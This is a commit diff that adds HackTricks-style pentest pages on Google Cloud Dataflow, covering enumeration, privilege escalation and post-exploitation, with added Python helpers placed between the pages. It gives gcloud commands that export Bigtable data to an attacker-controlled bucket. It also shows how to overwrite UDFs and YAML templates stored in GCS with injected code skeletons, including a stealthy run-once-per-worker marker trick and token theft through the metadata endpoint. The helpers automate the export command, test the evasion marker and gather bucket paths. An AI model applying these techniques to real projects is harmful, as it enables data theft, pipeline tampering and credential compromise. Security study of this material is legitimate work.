Translated ['src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp

2026-03-12 21:22:57 -07:00 · 2026-02-16 11:12:34 +00:00
parent 7929a65217
commit ed86acbf6f
3 changed files with 306 additions and 0 deletions
--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
@@ -0,0 +1,53 @@
+# GCP - Dataflow Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Dataflow
+
+For more information about Dataflow, see:
+
+{{#ref}}
+../gcp-services/gcp-dataflow-enum.md
+{{#endref}}
+
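+### Using Dataflow to exfiltrate data from other services
+
+**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over a SA with access to the source and sink)
+
+With permission to create Dataflow jobs, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub and other services into an attacker-controlled GCS bucket. This is a powerful post-exploitation technique once you have obtained Dataflow access, for example through the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).
+
+> [!NOTE]
+> You need `iam.serviceAccounts.actAs` over a service account that has enough permissions to read the source and write to the sink. If no service account is specified, the Compute Engine default SA is used.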
+
+#### Bigtable to GCS
+
+For the full pattern, see "Dump rows to your bucket" in [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket). Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
+
+<details>
+
+<summary>Export Bigtable to an attacker-controlled bucket</summary>
+```bash
+gcloud dataflow jobs run <job-name> \
+--gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
+--project=<PROJECT> \
+--region=<REGION> \
+--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
+--staging-location=gs://<YOUR_BUCKET>/staging/
+```
+</details>
+
+#### BigQuery to GCS
+
+Dataflow templates can export BigQuery data. Use the template that matches the target format (JSON, Avro, etc.) and point the output path at your bucket.
+
+#### Pub/Sub and streaming sources
+
+Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to a bucket you control.
+
+## References
+
+- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
+- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
+- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
+
+{{#include ../../../banners/hacktricks-training.md}}
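
The Bigtable export command in the page above can also be assembled programmatically when several sources have to be dumped. The following is a minimal Python sketch under stated assumptions: the helper name `build_template_export_cmd` and every example value (job name, project, instance, table, bucket, and template location) are hypothetical, and the template location is passed in by the caller rather than derived. Only the flags and parameter keys already shown in that command are used.

```python
import shlex


def build_template_export_cmd(job_name, gcs_location, project, region,
                              parameters, staging_location):
    """Return the argv list for `gcloud dataflow jobs run` with a classic template."""
    # --parameters takes comma-separated key=value pairs, as in the command above.
    param_str = ",".join(f"{key}={value}" for key, value in parameters.items())
    return [
        "gcloud", "dataflow", "jobs", "run", job_name,
        f"--gcs-location={gcs_location}",
        f"--project={project}",
        f"--region={region}",
        f"--parameters={param_str}",
        f"--staging-location={staging_location}",
    ]


# All values below are hypothetical placeholders.
cmd = build_template_export_cmd(
    job_name="export-job",
    gcs_location="gs://example-templates/latest/Cloud_Bigtable_to_GCS_Json",
    project="example-project",
    region="us-central1",
    parameters={
        "bigtableProjectId": "example-project",
        "bigtableInstanceId": "example-instance",
        "bigtableTableId": "example-table",
        "filenamePrefix": "dump",
        "outputDirectory": "gs://example-attacker-bucket/raw-json/",
    },
    staging_location="gs://example-attacker-bucket/staging/",
)

# Print a shell-quoted version for review before running it.
print(shlex.join(cmd))
```

The sketch joins parameters with plain commas, so it does not handle values that themselves contain commas. The returned list can be passed to `subprocess.run(cmd, check=True)` on a host where `gcloud` is installed and authenticated.
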
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
@@ -0,0 +1,172 @@
+# GCP - Dataflow Privilege Escalation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Dataflow
+
+{{#ref}}
+../gcp-services/gcp-dataflow-enum.md
+{{#endref}}
+
+### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`
+
+Dataflow does not validate the integrity of UDFs and job template YAMLs stored in GCS.
+With write access to the bucket, you can overwrite these files to inject code, execute code on the workers, steal service account tokens, or alter data processing.
+Both batch and streaming pipeline jobs are viable targets for this attack. To execute it against a pipeline, you need to replace the UDFs/templates before the job runs, during the first few minutes before the job workers are created, or while the job is running but before new workers spin up (due to autoscaling).
+
+**Attack vectors:**
+- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
+- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets
+
+
+> [!WARNING]
+> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: at the start, check whether a marker file (e.g. `/tmp/pwnd.txt`) exists; if it does, skip the malicious code; if it does not, run the payload and create the file. This way the payload runs **once per worker** rather than once per line.
+
+
+#### Direct exploitation via gcloud CLI
+
+1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:
+
+<details>
+
+<summary>List jobs and describe them to find the template path, staging location, and UDF references</summary>
+```bash
+# List jobs (optionally filter by region)
+gcloud dataflow jobs list --region=<region>
+gcloud dataflow jobs list --project=<PROJECT_ID>
+
+# Describe a job to get template GCS path, staging location, and any UDF/template references
+gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
+# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
+# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
+```
+</details>
+
+2. Download the original UDF or job template from GCS:
+
+<details>
+
+<summary>Download the UDF file or YAML template from the bucket</summary>
+```bash
+# If job references a UDF at gs://bucket/path/to/udf.py
+gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py
+
+# Or for a YAML job template
+gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
+```
+</details>
+
+3. Edit the file locally: inject the malicious payload (see the Python UDF or YAML snippets below) and make sure the run-once coordination pattern is used.
+
+4. Re-upload to overwrite the original file:
+
+<details>
+
+<summary>Overwrite the UDF or template in the bucket</summary>
+```bash
+gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py
+
+# Or for YAML
+gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
+```
+</details>
+
+5. Wait for the next job run, or (for streaming) trigger autoscaling (e.g. by flooding the pipeline input) so that new workers start and pull the modified file.
+
+#### Python UDF injection
+
+To have workers exfiltrate data to your C2 server, use `urllib.request` rather than `requests`; `requests` is not preinstalled on classic Dataflow workers.
+
+<details>
+
+<summary>Malicious UDF with run-once coordination and metadata extraction</summary>
+```python
+import os
+import json
+import urllib.request
+from datetime import datetime
+
+def _malicious_func():
+    # File-based coordination: run once per worker.
+    coordination_file = "/tmp/pwnd.txt"
+    if os.path.exists(coordination_file):
+        return
+
+    # malicious code goes here
+    with open(coordination_file, "w", encoding="utf-8") as f:
+        f.write("done")
+
+def transform(line):
+    # Malicious code entry point - runs per line but coordination ensures once per worker
+    try:
+        _malicious_func()
+    except Exception:
+        pass
+    # ... original UDF logic follows ...
+```
+</details>
+
+
+#### Job template YAML injection
+
+Inject a `MapToFields` step containing a callable that uses the coordination file. For YAML-based pipelines, use `requests` if the template declares `dependencies: [requests]`; otherwise use `urllib.request`.
+
+Add a cleanup step (`drop: [malicious_step]`) so the pipeline keeps writing valid data to the destination.
+
+<details>
+
+<summary>Malicious `MapToFields` step and cleanup in pipeline YAML</summary>
+```yaml
+- name: MaliciousTransform
+  type: MapToFields
+  input: Transform
+  config:
+    language: python
+    fields:
+      malicious_step:
+        callable: |
+          def extract_and_return(row):
+              import os
+              import json
+              from datetime import datetime
+              coordination_file = "/tmp/pwnd.txt"
+              if os.path.exists(coordination_file):
+                  return True
+              try:
+                  import urllib.request
+                  # malicious code goes here
+                  with open(coordination_file, "w", encoding="utf-8") as f:
+                      f.write("done")
+              except Exception:
+                  pass
+              return True
+    append: true
+- name: CleanupTransform
+  type: MapToFields
+  input: MaliciousTransform
+  config:
+    fields: {}
+    append: true
+    drop:
+      - malicious_step
+```
+</details>
+
+### Compute Engine access to Dataflow workers
+
+**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection
+
+Dataflow workers run as Compute Engine VMs. Access to a worker via OS Login or SSH lets you read the SA token from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code.
+
+For exploitation details, see:
+- [GCP - Compute Privesc](gcp-compute-privesc/README.md): `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
+
+## References
+
+- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
+- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
+- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
+- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
+- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
+
+{{#include ../../../banners/hacktricks-training.md}}
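
The run-once-per-worker coordination described in the warning of the page above can be checked locally before it is placed in a UDF. This is a minimal sketch, assuming a benign placeholder payload that only counts its own invocations; the helper name `run_once_per_worker`, the extra arguments of `transform`, and the temporary marker path are hypothetical and stand in for `/tmp/pwnd.txt` and the real payload.

```python
import os
import tempfile


def run_once_per_worker(marker_path, payload):
    """Call payload() only if marker_path does not exist yet; return True if it ran."""
    if os.path.exists(marker_path):
        return False
    payload()
    # The marker is written only after the payload finishes, as in the pattern above.
    with open(marker_path, "w", encoding="utf-8") as f:
        f.write("done")
    return True


def transform(line, marker_path, payload):
    """Per-row entry point: the guard runs on every row, the payload at most once."""
    try:
        run_once_per_worker(marker_path, payload)
    except Exception:
        pass  # a failing payload must not break the real transformation
    return line


# Simulate one worker processing 1000 rows with a counting placeholder payload.
calls = []
with tempfile.TemporaryDirectory() as tmp:
    marker = os.path.join(tmp, "marker.txt")
    rows = [transform(f"row-{i}", marker, lambda: calls.append(1))
            for i in range(1000)]

print(len(rows), len(calls))
```

Because the marker is created after the payload, a payload that raises leaves no marker and is retried on the next row. Writing the marker first would trade that retry for a strict at-most-once guarantee.
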
--- a/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md
@@ -0,0 +1,81 @@
+# GCP - Dataflow Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+**Google Cloud Dataflow** is a fully managed service for **batch and streaming data processing**. It lets organizations build pipelines that transform and analyze data at scale, integrating with Cloud Storage, BigQuery, Pub/Sub, and Bigtable. Dataflow pipelines run on worker VMs in your project; templates and User-Defined Functions (UDFs) are often stored in GCS buckets. [Learn more](https://cloud.google.com/dataflow).
+
+## Components
+
+A Dataflow pipeline typically includes:
+
+**Template:** YAML or JSON definitions (and Python/Java code for flex templates) stored in GCS that define the pipeline structure and steps.
+
+**Launcher (Flex Templates):** A short-lived Compute Engine instance may be used for Flex Template launches to validate the template and prepare containers before the job runs.
+
+**Workers:** Compute Engine VMs that perform the actual data processing tasks, pulling UDFs and instructions from the template.
+
+**Staging/Temp buckets:** GCS buckets that store temporary pipeline data, job artifacts, UDF files, and flex template metadata (`.json`).
+
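+## Batch vs Streaming Jobs
+
+Dataflow supports two execution modes:
+
+**Batch jobs:** Process a fixed, bounded dataset (e.g. a log file, a table export). The job runs once to completion and then terminates. Workers are created for the duration of the job and shut down when it finishes. Batch jobs are typically used for ETL, historical analysis, or scheduled data migrations.
+
+**Streaming jobs:** Process unbounded, continuously arriving data (e.g. Pub/Sub messages, live sensor feeds). The job runs until it is explicitly stopped. Workers may scale up and down; autoscaling can spawn new workers, which pull pipeline components (templates, UDFs) from GCS at startup.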
+
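+## Enumeration
+
+Dataflow jobs and related resources can be enumerated to gather service accounts, template paths, staging buckets, and UDF locations.
+
+### Job Enumeration
+
+To enumerate Dataflow jobs and retrieve their details: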
+```bash
+# List Dataflow jobs in the project
+gcloud dataflow jobs list
+# List Dataflow jobs (by region)
+gcloud dataflow jobs list --region=<region>
+
+# Describe job (includes service account, template GCS path, staging location, parameters)
+gcloud dataflow jobs describe <job-id> --region=<region>
+```
+### Template and Bucket Enumeration
+
+Job descriptions reveal the template GCS path, staging location, and worker service account, which is useful for identifying the buckets that store pipeline components.
+
+Buckets referenced in job descriptions may contain flex templates, UDFs, or YAML pipeline definitions:
+```bash
+# List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
+gcloud storage ls gs://<bucket>/
+
+# List objects recursively
+gcloud storage ls gs://<bucket>/**
+```
+## Privilege Escalation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-dataflow-privesc.md
+{{#endref}}
+
+## Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
+{{#endref}}
+
+## Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-dataflow-persistence.md
+{{#endref}}
+
+## References
+
+- [Dataflow overview](https://cloud.google.com/dataflow)
+- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
+- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)
+
+{{#include ../../../banners/hacktricks-training.md}}
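
The bucket enumeration step in the page above amounts to collecting every `gs://` path that appears in a job description. The following is a minimal Python sketch of that step, assuming the description has been saved as JSON (for example with `--format=json`). The helper names `find_gcs_paths` and `buckets_of` are hypothetical, and the `sample` dictionary is an invented shape for illustration, not the real layout of the describe output.

```python
import re

# Matches gs:// URIs made of common bucket/object characters.
GCS_URI = re.compile(r"gs://[A-Za-z0-9._\-/]+")


def find_gcs_paths(node):
    """Recursively collect every gs:// URI found in string values of parsed JSON."""
    found = set()
    if isinstance(node, dict):
        for value in node.values():
            found |= find_gcs_paths(value)
    elif isinstance(node, list):
        for item in node:
            found |= find_gcs_paths(item)
    elif isinstance(node, str):
        found.update(GCS_URI.findall(node))
    return found


def buckets_of(paths):
    """Return the sorted, de-duplicated bucket names of the given gs:// URIs."""
    return sorted({p[len("gs://"):].split("/", 1)[0] for p in paths})


# Hypothetical, simplified job description used only to exercise the helpers.
sample = {
    "id": "example-job",
    "type": "JOB_TYPE_BATCH",
    "options": {
        "tempLocation": "gs://example-staging/tmp",
        "stagingLocation": "gs://example-staging/staging",
        "templateLocation": "gs://example-templates/pipelines/job.yaml",
        "args": ["--udf=gs://example-templates/udfs/transform.py"],
    },
}

paths = find_gcs_paths(sample)
for path in sorted(paths):
    print(path)
print(buckets_of(paths))
```

Walking the whole structure instead of reading fixed keys keeps the sketch independent of where a given job stores its template, staging, or UDF references.
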